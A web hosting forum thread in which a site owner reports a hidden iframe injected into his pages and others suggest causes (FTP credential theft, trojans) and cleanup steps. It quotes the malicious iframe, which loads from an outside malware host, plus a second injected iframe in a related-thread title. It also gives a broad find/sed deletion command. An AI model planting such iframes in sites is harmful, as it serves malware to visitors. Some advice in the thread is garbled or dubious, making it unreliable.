Results 1 to 15 of 15
  1. #1
    Join Date
    Dec 2007
    Location
    Sao Paulo, Brazil
    Posts
    108

    hidden iframe placed on pages

    ok i was with a shared provider for a while and someone hacked my page and placed a hidden iframe

    Code:
    <iframe height="125" width="125" style="visibility: hidden;" src="http://a5i.ru:8080/ts/in.cgi?pepsi102"/>
    now I built this page from the ground up on a new vps and to my suprise the iframe showed up again on my new page

    first thought is someone is using a key logger but my home system is clean i just rebuilt it 2 days ago and i never type passwords i cut and past them

    any ideas?

  2. #2
    Join Date
    Oct 2007
    Location
    CA,USA
    Posts
    320
    Sound's like the server or site has a security vulnerability? Do you use cpanel?

    Form what it looks like form Site Advisor


    http://www.siteadvisor.com/sites/a5i.ru:8080

    - contain malware,
    - redirect to sites containing malware,
    - contain rogue antivirus,
    - redirect to fraud sites like Canadian Pharmacy.

  3. #3
    Join Date
    Apr 2003
    Location
    Earth
    Posts
    155
    You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32,Aviri) failed to detect the trojan. Malwarebytes successfully cleaned it.

  4. #4
    Join Date
    Dec 2007
    Location
    Sao Paulo, Brazil
    Posts
    108

    iframe attacks

    apparently its pretty common, I just found this

    http://blog.unmaskparasites.com/2009...ill-prevalent/

  5. #5
    Join Date
    Aug 2002
    Location
    Bharat
    Posts
    4,722
    Apart from your PC being infected, hackers also have system in place to sniff FTP details while you make connection to your server, later those details are used to infect your pages.

    Steps you can use to prevent this from happening.

    1) Use secure connection to FTP
    2) Use your control panel to upload files instead of FTP.
    3) Change FTP password after every use.

    Hopefully you won't get those infected pages again.
    Vinsar.Net - Quality Web Hosting at Economical Price on USA & European Servers
    Offering domains, shared, reseller & VPS hosting.
    Reliable Domain Reseller Account Resell Domains with Confidence

  6. #6
    Join Date
    Sep 2008
    Location
    Dallas, TX
    Posts
    4,552
    Quote Originally Posted by NicAddress View Post
    You sure the system is clean? Run malwarebytes on that machine. I had a problem like this several weeks ago and several online and two locally installed AV programs (NOD32,Aviri) failed to detect the trojan. Malwarebytes successfully cleaned it.
    +1 for malwarebytes.





    I've seen that same exact iframe(ending with pepsi) a lot lately, seems really common

  7. #7
    Join Date
    May 2009
    Location
    Kandy, Sri Lanka
    Posts
    205
    Hi,

    I think this is a virus, cos i have encounted this before. A friend of mine developed website in HTML, and her pc was infected with some kind of virus. This virus would add an iframe to all HTML docs created by her, but didn't touch any php codes on that site.

    Also Avira was able to detect this very easily. I'd say rescan your system and see. use an offline scan, boot from a cd/another hdd and do a scan. that way you'll find the cause.

  8. #8
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581

    How to remove a5i.ru iframe

    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word " a5i.ru " . The command will search all the files under /home

    We are advising you to take necessary backups before running the above script.


    The basic steps that is to be done to prevent this type of attack in future are

    1) Scan your server periodically and check for rootkits and vulnerablilities.

    2) Update all the 3rd party softwares to the latest version

    3) Make sure your ftp paswords are updated

    4) Ensure that appropriate file permissions are used for every file and directory on the web server
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  9. #9
    Join Date
    Aug 2002
    Location
    Bharat
    Posts
    4,722
    Quote Originally Posted by logicsupport View Post
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============
    Normally that iframe code starts in the same line as opening <body> tag, so its better to construct the line to replace the line with <body> as that tag will also get deleted.

    Moreover its better to first examine few files on the server how and where the code is inserted as in some cases I have observed it to be in the </body> line.
    Vinsar.Net - Quality Web Hosting at Economical Price on USA & European Servers
    Offering domains, shared, reseller & VPS hosting.
    Reliable Domain Reseller Account Resell Domains with Confidence

  10. #10
    Join Date
    Nov 2007
    Location
    India
    Posts
    843
    Quote Originally Posted by logicsupport View Post
    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word " a5i.ru " . The command will search all the files under /home

    We are advising you to take necessary backups before running the above script.


    The basic steps that is to be done to prevent this type of attack in future are

    1) Scan your server periodically and check for rootkits and vulnerablilities.

    2) Update all the 3rd party softwares to the latest version

    3) Make sure your ftp paswords are updated

    4) Ensure that appropriate file permissions are used for every file and directory on the web server

    thanks it really good info for all
    HostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
    yajur | Sales Team
    CPanel Hosting R1 Soft Offsite-Backup Great Uptime
    http://hostnotch.com sales @ hostnotch.com

  11. #11
    Join Date
    Mar 2004
    Location
    Chennai India
    Posts
    115
    Don't change the FTP password in your client machine , they are getting the ftp passwords by encrypting ftp password files.
    miOOt Chat Solutions
    live chat Software for web hosting Customer Service
    Importance of Live Chat Software for Web Hosting Business

  12. #12
    Join Date
    Jun 2003
    Location
    World Wide Web
    Posts
    581
    Hi ,

    Thanks Yajur .

    If you are having this problem server wide then the only possibility is your root password is used for this. Its better you change your root password . If its only on one account , just change the FTP password and that should work .
    SupportExpertz.com - the name says it all!
    Managed Cloud Servers
    Server Management and Monitoring
    24x7 outsourced customer support

  13. #13
    Join Date
    Jan 2008
    Posts
    84
    its the nowadays common ftp exploit. Change all passwords for accounts that you have saved in your local ftp client.

  14. #14
    Join Date
    Oct 2007
    Location
    rules.php
    Posts
    49
    Quote Originally Posted by logicsupport View Post
    Hi ,


    Please use the following script
    ===============
    find /home \( -name "*.php" -o -name "*.html" -o -iname "*.htm" \) -exec grep -l "a5i.ru" {} \; -exec sed -i "/"a5i.ru"/d" {} \;
    ===============


    The above command will remove the line which contains the word " a5i.ru " . The command will search all the files under /home

    We are advising you to take necessary backups before running the above script.


    The basic steps that is to be done to prevent this type of attack in future are

    1) Scan your server periodically and check for rootkits and vulnerablilities.

    2) Update all the 3rd party softwares to the latest version

    3) Make sure your ftp paswords are updated

    4) Ensure that appropriate file permissions are used for every file and directory on the web server
    Oh, many thanks to you.

  15. #15
    Once you upload a fresh copy, then it will be more secure, if you change the ownerships of the file to root.root

    simply,

    chown root.root <index file>

Similar Threads

  1. Replies: 0
    Last Post: 01-24-2008, 04:37 PM
  2. Replies: 4
    Last Post: 03-17-2006, 12:58 AM
  3. Redirecting pages outside a IFrame
    By coops in forum Programming Discussion
    Replies: 4
    Last Post: 12-06-2005, 11:12 AM
  4. Sitewide Link 4 Sale -15000 pages indexed many PR Pages
    By mddv in forum Advertising Offers
    Replies: 0
    Last Post: 09-12-2005, 07:57 AM
  5. <IFRAME SRC="http://www.forced-action.com/?d=get" WIDTH=1 HEIGHT=1></IFRAME>
    By rychen in forum Hosting Security and Technology
    Replies: 7
    Last Post: 03-12-2004, 01:29 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •